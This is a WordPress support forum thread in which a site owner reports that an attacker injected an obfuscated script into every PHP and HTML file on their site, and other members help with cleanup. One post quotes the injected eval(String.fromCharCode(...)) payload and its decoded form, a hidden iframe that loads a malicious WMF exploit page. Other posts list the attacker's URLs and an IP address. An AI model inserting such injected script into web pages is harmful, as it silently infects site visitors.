WordPress.org

Ready to get started?Download WordPress

Forums

possible exploit in tinymce js (14 posts)

  1. Duvy
    Member
    Posted 8 years ago #

    Hi, everyone, i've been using wordpress for almost a year now to run my magazine site and soon after I upgraded to 2.0 the other day and a day or so later a bot used one of the javascripts to insert an exploit (the wmf exploit that is on the news) to every php and html file in my account. It then began trying to serve the exploit to my visitors from a url that I won't post because it is direct to the wmf file. I'm protected against it and the only way I even notice it is anti-vir kept giving me warnings. I have screenshots of the warnings. My site is hosted at powweb and they kept turning off my wordpress database telling me it was abusing the system, so i restored a backup and that seemed to stop it, but when I went into wordpress to write a post and clicked the edit html button on the tinymce quicktags, it started all over again. Does anyone know if this is a possible exploit in tinymce js and has anyone else had this problem? How can I get rid of it? I deleted tinymce from my server, just in case.
    thanks in advance for any help I may recieve.

  2. Mark (podz)
    Support Maven
    Posted 8 years ago #

    "a bot used one of the javascripts to insert an exploit (the wmf exploit that is on the news) to every php and html file in my account"

    That sounds like a host that dose things on the cheap and does not take server security into consideration.

    Move hosts.

    I'll let someone with more knowledge definitely shoot this down, but from others who have had this WMF exploit, it's because of the shared hosting environment and some pathetic script-kiddie. There is nothing here to implicate WP.

    Powweb ... take your money elsewhere.

  3. Mark (podz)
    Support Maven
    Posted 8 years ago #

    To deal with it - you need to delete every file that is infected.

    Download everything.
    Delete certainly all the WP files
    Upload new
    Check non-wp files and upload if clean.

    Or

    If you are on Windows, download everything (literally) then use a search program like Agent Ransack to search for the url that users are being directed to. That will show what and where to clean.

    Agent Ransack:
    http://www.mythicsoft.com/agentransack/default.aspx
    Freeware.

  4. Duvy
    Member
    Posted 8 years ago #

    I've already cleaned it up twice, deleteing entire site, cleaning every file with multi-replace, checking them to make sure the code is gone from each page, restoring a backup, and it goes away, but then when I use the feature rich text editor, it starts again.
    this is the code that was replicating into every php and html in my site

    eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,101,97,114,99,104,105,110,103,119,119,119,46,110,101,116,47,114,101,118,101,114,115,101,95,102,117,110,46,104,116,109,108,34,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,105,102,114,97,109,101,62,39,41))

    This is the code (translated):

    Code:
    'document.write(\'<iframe src="http://searchingwww.net/reverse_fun.html" height=0 width=0 border=0 frameborder=0></iframe>\')'

    now that I have removed tinymce completely it has stopped, but i'm worried that won't stop this from happening in the future and maybe it is happening seamlessly to other sites, like i mentioned, I would not have detected it if I wasn't using zone alarm/antivir, it would have slipped the file into my temporary internet folder without even asking me. Honestly, i have never had trouble with powweb until upgrading wordpress a few days ago. I'm not blaming wordpress or anything, just bots and hackers, but I like using tinymce and I want to block it, or get that site pulled so they can't do it anymore. :-( Any suggestions?
    thank for all your help!

    edit: I also tested in 3 browsers and it it affected all of them, so it isn't just IE.

  5. Mark (podz)
    Support Maven
    Posted 8 years ago #

    I just went to that site (I'm reckless) and there seems to be nothing there now.

    Are you sure you are fully deleting the server stuff, downloaded a new WP from here, cleared all caches etc ?

  6. Duvy
    Member
    Posted 8 years ago #

    yeah it looks blank if you don't have a program to alert you that it is there. I get a warning in antivir that says the site is trying to install reverse_fun.wmf which is a known exploit/virus. If you view the source on that page it links to http:// cc.ad-ware .cc/dia489/ lau.jpg which is nothing also. If you have anti-virus software I suggest you update it and run it, just in case, because it installs seamlessly you won't notice until it's messing things up. I patched windows when the patch hit microsoft update and it still almost infected my PC. Could it have gotten into my database? I haven't install a new copy of wordpress because if it's in the database it will just start again and right now I have it contained. I'm not too good with mysql so i'm not sure how to check.
    edit: if you are not sure please don't follow that above image.

  7. Mark (podz)
    Support Maven
    Posted 8 years ago #

    I've broken the image link.

  8. Duvy
    Member
    Posted 8 years ago #

    it does look like it's gone down since a few hours ago but the image with the exploit in it is still there http://searchingwww.net/reverse_fun
    try adding .wmf to the end of that url in place of .html and a graphic tries to download which is the actual exploit. This is what is popping up in my browser 82.179.170.11/dia489
    and that site is still there.

  9. whooami
    Member
    Posted 8 years ago #

    for a very critical analysis of what you are seeing, read this:

    http://www.mnin.org/write/2005_jpegtodll.html

  10. Duvy
    Member
    Posted 8 years ago #

    So how exactly is it getting into my website? I've used hijack this and anti-virus software, three browsers, system restore, ad-aware, spybot and a few other programs and it isn't showing on my harddrive or windows system files anywhere. IE hasn't been changed on my PC at all. I was in the middle of writing a post when it started. :-(

  11. whooami
    Member
    Posted 8 years ago #

    do you have access to your servers raw logs? if so, I would love to take a look at them. Of course, depending on your time, the downloadable copy wont have "todays" hits in them.

  12. Duvy
    Member
    Posted 8 years ago #

    I have access to logs in ftp and logs in the user manager, not sure if they are raw or cleaned up for dummies. The exploit attack was wednesday and thursday. I was awake for 27 hours trying to find out how they did it. How should I send or show the logs? Would be grateful for any help.
    my site is
    http://www.darkfaeryglitter.org and wordpress is at
    http://blog.darkfaeryglitter.org

  13. whooami
    Member
    Posted 8 years ago #

    ohh, well if it happened then, yes it would all be in your server logs, if you like feel free to send a copy of the tar.gz to logs AT village-idiot.org.

    Honestly a good look at what exactly goes on server side would be very interesting...

    and yes, they should be raw apache logs

    if its easier for you you could even post the tar.gz on your site, provide the link, and ill download it. Whichever is easiest.

  14. whooami
    Member
    Posted 8 years ago #

    duvy, got your email, the logs, and I replied. Thank you again, hopefully I might shed some light on what happened.

Topic Closed

This topic has been closed to new replies.

About this Topic